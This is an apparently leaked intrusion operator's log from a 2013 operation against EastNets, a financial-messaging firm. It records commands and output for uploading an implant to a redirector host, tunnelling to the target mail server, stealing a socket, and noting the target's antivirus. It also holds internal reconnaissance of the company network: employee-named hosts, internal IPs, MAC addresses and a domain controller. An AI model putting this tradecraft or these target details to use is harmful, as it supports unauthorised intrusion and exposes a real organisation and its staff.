shadowbrokers-exploits/swift/Employee.txt


ISP: LK
City:
Phone:
ISP IP: 186.120.114.169
Source IP:
FINAL target IP:
Ops Machine: LOCALHOST.LOCALDOMAIN
Redirecting Method 1: PITCHIMPAIR
Redirect Host 1: 210.135.90.41
Redirect Target 1: 192.168.1.3
BEGIN UNIX OPNOTES:
Targets (IP, full domain name, target tags: pitchimpair unsuccessful not_attempted ) :
--> 210.135.90.41 cnt1.din.or.jp pitchimpair unix successful
---> 192.168.1.3 endxbmail001.eastnets.com jeepflea_market windows successful
Ops Machine: WO
Results:
PROJECT=JEEPFLEA_MARKET
OPUSER=85521
OPSCHEDULE=13082113184448
SCRUBVER=6.007000008
======================= P0
--- 210.135.90.41 --- cnt1
=======================
ourtn -Y5U /current/up/noserver-x86sol2.8 -wBIN 210.135.90.41
2013-08-29 02:44:00 UTC -- on target
2013-08-29 02:46:02 UTC -- w
Uptime: 106 day(s), 0:15:26
2013-08-29 02:57:51 UTC -- tunnels
-tunnel
l 110 213.132.40.101 110 38951
-rawsend 666
2013-08-29 04:06:03 UTC -- checking some others
-ping 80.227.254.201
ICMP Reply (80.227.254.201) 195.906 ms 80.227.254.201 > 210.135.90.41 (TTL 51)
-ping -r 80.227.254.201 -i -p 48600
ICMP Reply (80.227.254.201) 1.4294166 s 80.227.254.201 > 210.135.90.41 (TTL 51)
.... no other open ports
2013-08-29 04:27:35 UTC -- another target 80.227.254.202
-ping -r 80.227.254.202 -t -p 2194
80.227.254.202:2194 -> 210.135.90.41:15563 SYN ACK (port 2194 open)
-ping -r 80.227.254.202 -t -p 2443
80.227.254.202:2443 -> 210.135.90.41:15563 SYN ACK (port 2443 open)
2013-08-29 05:39:46 UTC -- preburn checks
2013-08-29 05:39:54 UTC -- bb
LOCALHOST.LOCALDOMAIN: scrubhands v. 6.007000008 20130829-0238
###################
SCRUBHANDS v6.007000008 (suite v6.7.0.08 run in /192.168.254.71) command line:
:
/usr/local/bin/scrubhands -t -S 13082113184448 -I 85521 -P JEEPFLEA_MARKET -n 200.42.213.11,200.42.213.21 186.120.114.169/240/174
###################
Final lines of bwmonitor.txt:
Thu Aug 29 05:43:04 UTC 2013
eth0 bytes (MB) packets kbps (kBps) kbps-1m kbps-10m kbps-hr
TX 3429926 (3.3) 13314 0.0 (0.0) 1.3 0.8 0.9
RX 4484806 (4.3) 12814 0.0 (0.0) 5.0 1.7 1.5
###################################################
PROJECT: jeepflea_market
DATE: 02:42 AM 08/29/2013
OPUSER: 85521
OPSCHEDULE: 13082113184448
#Op Status: Unsuccessful
#Non-Standard: True
###################################################
Targets:
Results:
======================= T1
--- 192.168.1.3 --- endxbmail001
=======================
2:58 AM 8/29/2013 --- trigger sent
3:01 AM 8/29/2013 -- failed with only forward tunnel
3:01 AM 8/29/2013 -- trying with rawsend
3:03 AM 8/29/2013 -- hadouken... socketsteal w/ 110
Uptime: 95 days, 19:0:10
3:10 AM 8/29/2013 -- Kaspersky Endpoint Security 8.1.0.831
3:17 AM 8/29/2013 -- hour clean
3:20 AM 8/29/2013 -- looking for targs
nslookup endxb-kbaluyot - 192.168.153.144
nslookup kbaluyot - 10.10.10.118
nslookup managment - failed
nslookup endjuy - failed
nslookup endxb-asanghvi - failed
nslookup asanghvi - failed
nslookup juy - 10.10.10.117
nslookup vmailbox2 - 192.168.2.12
nslookup endxb-msyed - 10.10.10.74
nslookup msyed - failed
3:25 AM 8/29/2013 -- scanning 192.168.153.144
ping - failed
rpc 192.168.153.144 1 445 - failed
3:31 AM 8/29/2013 -- scanning some more targs
ping 10.10.10.117
REPLY from 10.10.10.117 -> 192.168.1.3 -- TTL: 63
netbios -target 10.10.10.117 - failed
rpc 10.10.10.117 1 445 - failed
ping 10.10.10.1 - failed
ping 10.10.10.118 - failed
ping 192.168.2.12 - failed
ping 10.10.10.74 - failed
ping 80.227.254.243 - failed
4:20 AM 8/29/2013 -- trying some fws
banner -ip 80.227.254.201 -tcp -port 2443 - can't reach network
ping 172.16.104.17 - failed
5:12 AM 8/29/2013 -- seeing if they are in
REPLY from 10.10.10.118 -> 192.168.1.3 -- TTL: 127
netbios -target 10.10.10.118
---------------------------------------------------------------------
ENDXB-COBAS UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
ENDXB-COBAS UNIQUE REGISTERED File Server Service
EASTNETS GROUP REGISTERED Browser Service Elections
Adapter Address: 00.26.c6.38.98.30
Adapter Type : Ethernet Adapter
netbios -target 192.168.153.144 - fail
rpc 10.10.10.118 1 445
5:22 AM 8/29/2013 -- netbios -target 10.10.10.23
ENDXB-CALTAKI UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
ENDXB-CALTAKI UNIQUE REGISTERED File Server Service
EASTNETS GROUP REGISTERED Browser Service Elections
Adapter Address: 9c.b7.0d.17.7b.e6
Adapter Type : Ethernet Adapter
5:31 AM 8/29/2013 -- netbios -target 192.168.2.10
---------------------------------------------------------------------
VDC04 UNIQUE REGISTERED Workstation Service
EASTNETS GROUP REGISTERED Domain Name
EASTNETS GROUP REGISTERED Domain Controller
VDC04 UNIQUE REGISTERED File Server Service
Adapter Address: 00.0c.29.8d.e3.3a
Adapter Type : Ethernet Adapter
5:37 AM 8/29/2013